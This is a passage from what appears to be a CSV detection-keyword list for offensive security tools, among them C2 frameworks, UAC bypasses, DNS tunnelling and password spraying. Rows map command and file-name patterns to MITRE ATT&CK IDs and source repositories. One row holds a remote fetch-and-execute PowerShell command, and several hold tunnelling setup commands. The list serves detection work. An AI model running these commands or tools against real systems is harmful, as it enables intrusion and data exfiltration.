"*Invoke-WMIExec*",".{0,1000}Invoke\-WMIExec.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-WMIExec*",".{0,1000}Invoke\-WMIExec.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-WMIExec.ps1*",".{0,1000}Invoke\-WMIExec\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*invoke-wmijspayload*",".{0,1000}invoke\-wmijspayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-WMILM*",".{0,1000}Invoke\-WMILM.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-WMILM.json*",".{0,1000}Invoke\-WMILM\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-WMImplant*",".{0,1000}Invoke\-WMImplant.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Invoke-WMIObfuscatedPSCommand*",".{0,1000}Invoke\-WMIObfuscatedPSCommand.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*invoke-wmipayload*",".{0,1000}invoke\-wmipayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-WMIpersist*",".{0,1000}Invoke\-WMIpersist.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","0","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z" "*Invoke-WMIpersist.ps1*",".{0,1000}Invoke\-WMIpersist\.ps1.{0,1000}","offensive_tool_keyword","Invoke-WMIpersist","A powershell script to create WMI Event subscription persistence","T1546.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/bspence7337/Invoke-WMIpersist","1","1","N/A","10","1","7","0","2018-05-18T16:42:52Z","2017-11-02T03:47:25Z" "*Invoke-WMIRemoting*",".{0,1000}Invoke\-WMIRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Invoke-WmiShadowCopy*",".{0,1000}Invoke\-WmiShadowCopy.{0,1000}","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" "*Invoke-WScriptBypassUAC*",".{0,1000}Invoke\-WScriptBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*Invoke-WScriptBypassUAC*",".{0,1000}Invoke\-WScriptBypassUAC.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-WscriptElevate*",".{0,1000}Invoke\-WscriptElevate.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-WScriptBypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ZeroLogon*",".{0,1000}Invoke\-ZeroLogon.{0,1000}","offensive_tool_keyword","Invoke-ZeroLogon","Zerologon CVE exploitation","T1210 - T1212 - T1216 - T1003.001 - T1003.002 - T1003.003 - T1003.004","TA0001 - TA0004 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY/Invoke-ZeroLogon","1","1","N/A","N/A","3","211","47","2020-10-14T04:42:58Z","2020-09-17T05:01:46Z" "*Invoke-Zerologon*",".{0,1000}Invoke\-Zerologon.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Invoking CreateSvcRpc (by @x86matthew*",".{0,1000}Invoking\sCreateSvcRpc\s\(by\s\@x86matthew.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*io_dirtycow.c*",".{0,1000}io_dirtycow\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*io_dirtycow.so*",".{0,1000}io_dirtycow\.so.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*iodine -*",".{0,1000}iodine\s\-.{0,1000}","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine -f *",".{0,1000}iodine\s\-f\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine IP over DNS tunneling client*",".{0,1000}iodine\sIP\sover\sDNS\stunneling\sclient.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine IP over DNS tunneling server*",".{0,1000}iodine\sIP\sover\sDNS\stunneling\sserver.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine -v*",".{0,1000}iodine\s\-v.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodined -*",".{0,1000}iodined\s\-.{0,1000}","offensive_tool_keyword","iodine","tunnel IPv4 over DNS tool","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodined -c*",".{0,1000}iodined\s\-c.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodined -f *",".{0,1000}iodined\s\-f\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodined -v*",".{0,1000}iodined\s\-v.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-latest/*",".{0,1000}iodine\-latest\/.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-latest-android.zip*",".{0,1000}iodine\-latest\-android\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-latest-win32*",".{0,1000}iodine\-latest\-win32.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-latest-windows*",".{0,1000}iodine\-latest\-windows.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodine-server.service*",".{0,1000}iodine\-server\.service.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iodinetestingtesting*",".{0,1000}iodinetestingtesting.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*iomoath/PowerShx*",".{0,1000}iomoath\/PowerShx.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*iomoath/SharpSpray*",".{0,1000}iomoath\/SharpSpray.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","10","2","125","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z" "*ionide *",".{0,1000}ionide\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*ionided *",".{0,1000}ionided\s.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*ios7tojohn.pl*",".{0,1000}ios7tojohn\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1643","218","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" "*ip link set ligolo up*",".{0,1000}ip\slink\sset\sligolo\sup.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ip route add * dev ligolo*",".{0,1000}ip\sroute\sadd\s.{0,1000}\sdev\sligolo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ip route add * dev ligolo*",".{0,1000}ip\sroute\sadd\s.{0,1000}\sdev\sligolo.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ip tuntap add user * mode tun ligolo*",".{0,1000}ip\stuntap\sadd\suser\s.{0,1000}\smode\stun\sligolo.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","0","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*ip tuntap add user root mode tun ligolo*",".{0,1000}ip\stuntap\sadd\suser\sroot\smode\stun\sligolo.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*IPeerToPeerService.*",".{0,1000}IPeerToPeerService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*IPfuscation.sln*",".{0,1000}IPfuscation\.sln.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*IPfuscation.vcxproj*",".{0,1000}IPfuscation\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP *",".{0,1000}iptables\s\-\%c\sOUTPUT\s\-p\stcp\s\-d\s127\.0\.0\.1\s\-\-tcp\-flags\sRST\sRST\s\-j\sDROP\s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*iptables -t nat -A REDSOCKS*",".{0,1000}iptables\s\-t\snat\s\-A\sREDSOCKS.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*IQoJb3Jpz2cXpQRkpVX3Uf*",".{0,1000}IQoJb3Jpz2cXpQRkpVX3Uf.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","0","N/A","8","1","84","2","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z" "*IReversePortForwardService.*",".{0,1000}IReversePortForwardService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*irkjanm/krbrelayx*",".{0,1000}irkjanm\/krbrelayx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*irm unit259.fyi/dbgui | iex*",".{0,1000}irm\sunit259\.fyi\/dbgui\s\|\siex.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*irs.exe -*",".{0,1000}irs\.exe\s\-.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*irs.exe exec*",".{0,1000}irs\.exe\sexec.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - 